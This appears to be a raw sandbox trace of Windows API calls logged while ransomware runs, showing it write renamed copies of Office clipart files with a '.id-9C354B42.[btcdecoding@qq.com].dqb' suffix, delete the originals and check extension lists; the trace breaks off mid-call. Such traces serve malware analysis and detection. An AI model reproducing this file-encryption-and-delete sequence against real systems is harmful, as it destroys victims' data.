[0050.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0050.518] lstrlenW (lpString=".1cd") returned 4 [0050.518] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0050.518] lstrlenW (lpString=".jpg") returned 4 [0050.518] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.518] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=12482) returned 1 [0050.518] CloseHandle (hObject=0x178) returned 1 [0050.518] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif")) returned 0x20 [0050.518] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0050.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0050.518] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.518] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0050.519] GetLastError () returned 0x0 [0050.519] ReadFile (in: hFile=0x178, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x30c2, lpOverlapped=0x0) returned 1 [0050.520] WriteFile (in: hFile=0x160, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x30d0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x30d0, lpOverlapped=0x0) returned 1 [0050.521] ReadFile (in: hFile=0x178, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0050.521] WriteFile (in: hFile=0x160, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.521] SetEndOfFile (hFile=0x160) returned 1 [0050.522] CloseHandle (hObject=0x160) returned 1 [0050.522] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.522] SetEndOfFile (hFile=0x178) returned 1 [0050.522] CloseHandle (hObject=0x178) returned 1 [0050.523] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.523] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif")) returned 1 [0050.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0050.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0050.523] lstrlenW (lpString=".doc") returned 4 [0050.523] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.523] lstrlenW (lpString=".docx") returned 5 [0050.523] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.523] lstrlenW (lpString=".pdf") returned 4 [0050.523] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.523] lstrlenW (lpString=".xls") returned 4 [0050.523] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.523] lstrlenW (lpString=".xlsx") returned 5 [0050.523] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.523] lstrlenW (lpString=".ppt") returned 4 [0050.523] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0050.523] lstrlenW (lpString=".zip") returned 4 [0050.523] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.523] lstrlenW (lpString=".rar") returned 4 [0050.523] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.523] lstrlenW (lpString=".bz2") returned 4 [0050.523] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.524] lstrlenW (lpString=".7z") returned 3 [0050.524] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0050.524] lstrlenW (lpString=".dbf") returned 4 [0050.524] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0050.524] lstrlenW (lpString=".1cd") returned 4 [0050.524] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0050.524] lstrlenW (lpString=".jpg") returned 4 [0050.524] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.524] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.524] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.524] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0050.524] GetLastError () returned 0x0 [0050.524] ReadFile (in: hFile=0x178, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x1485, lpOverlapped=0x0) returned 1 [0050.526] WriteFile (in: hFile=0x160, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x1490, lpOverlapped=0x0) returned 1 [0050.527] ReadFile (in: hFile=0x178, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0050.527] WriteFile (in: hFile=0x160, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.527] SetEndOfFile (hFile=0x160) returned 1 [0050.527] CloseHandle (hObject=0x160) returned 1 [0050.528] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.528] SetEndOfFile (hFile=0x178) returned 1 [0050.528] CloseHandle (hObject=0x178) returned 1 [0050.528] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.529] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif")) returned 1 [0050.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0050.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0050.529] lstrlenW (lpString=".doc") returned 4 [0050.529] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.529] lstrlenW (lpString=".docx") returned 5 [0050.529] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.529] lstrlenW (lpString=".pdf") returned 4 [0050.529] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.529] lstrlenW (lpString=".xls") returned 4 [0050.529] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.529] lstrlenW (lpString=".xlsx") returned 5 [0050.529] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.529] lstrlenW (lpString=".ppt") returned 4 [0050.529] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0050.529] lstrlenW (lpString=".zip") returned 4 [0050.529] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.529] lstrlenW (lpString=".rar") returned 4 [0050.529] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.529] lstrlenW (lpString=".bz2") returned 4 [0050.529] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.529] lstrlenW (lpString=".7z") returned 3 [0050.530] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0050.530] lstrlenW (lpString=".dbf") returned 4 [0050.530] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0050.530] lstrlenW (lpString=".1cd") returned 4 [0050.530] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0050.530] lstrlenW (lpString=".jpg") returned 4 [0050.530] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.530] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.531] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0050.531] GetLastError () returned 0x0 [0050.531] ReadFile (in: hFile=0x178, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0xa24, lpOverlapped=0x0) returned 1 [0050.532] WriteFile (in: hFile=0x160, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xa30, lpOverlapped=0x0) returned 1 [0050.533] ReadFile (in: hFile=0x178, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0050.533] WriteFile (in: hFile=0x160, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.534] SetEndOfFile (hFile=0x160) returned 1 [0050.534] CloseHandle (hObject=0x160) returned 1 [0050.534] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.534] SetEndOfFile (hFile=0x178) returned 1 [0050.535] CloseHandle (hObject=0x178) returned 1 [0050.535] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.535] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif")) returned 1 [0050.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0050.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0050.535] lstrlenW (lpString=".doc") returned 4 [0050.535] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.535] lstrlenW (lpString=".docx") returned 5 [0050.535] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.535] lstrlenW (lpString=".pdf") returned 4 [0050.535] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.535] lstrlenW (lpString=".xls") returned 4 [0050.535] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.535] lstrlenW (lpString=".xlsx") returned 5 [0050.535] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.535] lstrlenW (lpString=".ppt") returned 4 [0050.535] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0050.535] lstrlenW (lpString=".zip") returned 4 [0050.535] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.535] lstrlenW (lpString=".rar") returned 4 [0050.536] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.536] lstrlenW (lpString=".bz2") returned 4 [0050.536] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.536] lstrlenW (lpString=".7z") returned 3 [0050.536] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0050.989] lstrlenW (lpString=".dbf") returned 4 [0050.992] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0050.992] lstrlenW (lpString=".1cd") returned 4 [0050.992] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0050.992] lstrlenW (lpString=".jpg") returned 4 [0050.992] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.993] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.993] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.993] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0050.993] GetLastError () returned 0x0 [0050.993] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0xc30, lpOverlapped=0x0) returned 1 [0050.994] WriteFile (in: hFile=0x228, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xc40, lpOverlapped=0x0) returned 1 [0050.995] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0050.995] WriteFile (in: hFile=0x228, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.995] SetEndOfFile (hFile=0x228) returned 1 [0050.995] CloseHandle (hObject=0x228) returned 1 [0050.995] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.995] SetEndOfFile (hFile=0x1dc) returned 1 [0050.996] CloseHandle (hObject=0x1dc) returned 1 [0050.996] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.996] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif")) returned 1 [0050.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0050.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0050.997] lstrlenW (lpString=".doc") returned 4 [0050.997] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.997] lstrlenW (lpString=".docx") returned 5 [0050.997] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.997] lstrlenW (lpString=".pdf") returned 4 [0050.997] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.997] lstrlenW (lpString=".xls") returned 4 [0050.997] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.997] lstrlenW (lpString=".xlsx") returned 5 [0050.997] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.997] lstrlenW (lpString=".ppt") returned 4 [0050.997] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0050.997] lstrlenW (lpString=".zip") returned 4 [0050.997] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.997] lstrlenW (lpString=".rar") returned 4 [0050.997] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.997] lstrlenW (lpString=".bz2") returned 4 [0050.997] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.997] lstrlenW (lpString=".7z") returned 3 [0050.997] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0050.997] lstrlenW (lpString=".dbf") returned 4 [0050.997] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0050.997] lstrlenW (lpString=".1cd") returned 4 [0050.997] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0050.997] lstrlenW (lpString=".jpg") returned 4 [0050.997] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.998] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.998] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0050.998] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0050.999] GetLastError () returned 0x0 [0050.999] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0xbd2, lpOverlapped=0x0) returned 1 [0051.000] WriteFile (in: hFile=0x228, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xbe0, lpOverlapped=0x0) returned 1 [0051.001] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0051.001] WriteFile (in: hFile=0x228, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.001] SetEndOfFile (hFile=0x228) returned 1 [0051.001] CloseHandle (hObject=0x228) returned 1 [0051.001] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0051.001] SetEndOfFile (hFile=0x1dc) returned 1 [0051.002] CloseHandle (hObject=0x1dc) returned 1 [0051.002] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.002] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf")) returned 1 [0051.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0051.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0051.003] lstrlenW (lpString=".doc") returned 4 [0051.003] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.003] lstrlenW (lpString=".docx") returned 5 [0051.003] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.003] lstrlenW (lpString=".pdf") returned 4 [0051.003] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.003] lstrlenW (lpString=".xls") returned 4 [0051.003] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.003] lstrlenW (lpString=".xlsx") returned 5 [0051.003] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.003] lstrlenW (lpString=".ppt") returned 4 [0051.003] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0051.003] lstrlenW (lpString=".zip") returned 4 [0051.003] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.003] lstrlenW (lpString=".rar") returned 4 [0051.003] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.003] lstrlenW (lpString=".bz2") returned 4 [0051.003] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.003] lstrlenW (lpString=".7z") returned 3 [0051.003] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0051.003] lstrlenW (lpString=".dbf") returned 4 [0051.003] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0051.003] lstrlenW (lpString=".1cd") returned 4 [0051.003] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0051.003] lstrlenW (lpString=".jpg") returned 4 [0051.003] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.004] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0051.004] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0051.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0051.004] GetLastError () returned 0x0 [0051.004] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, 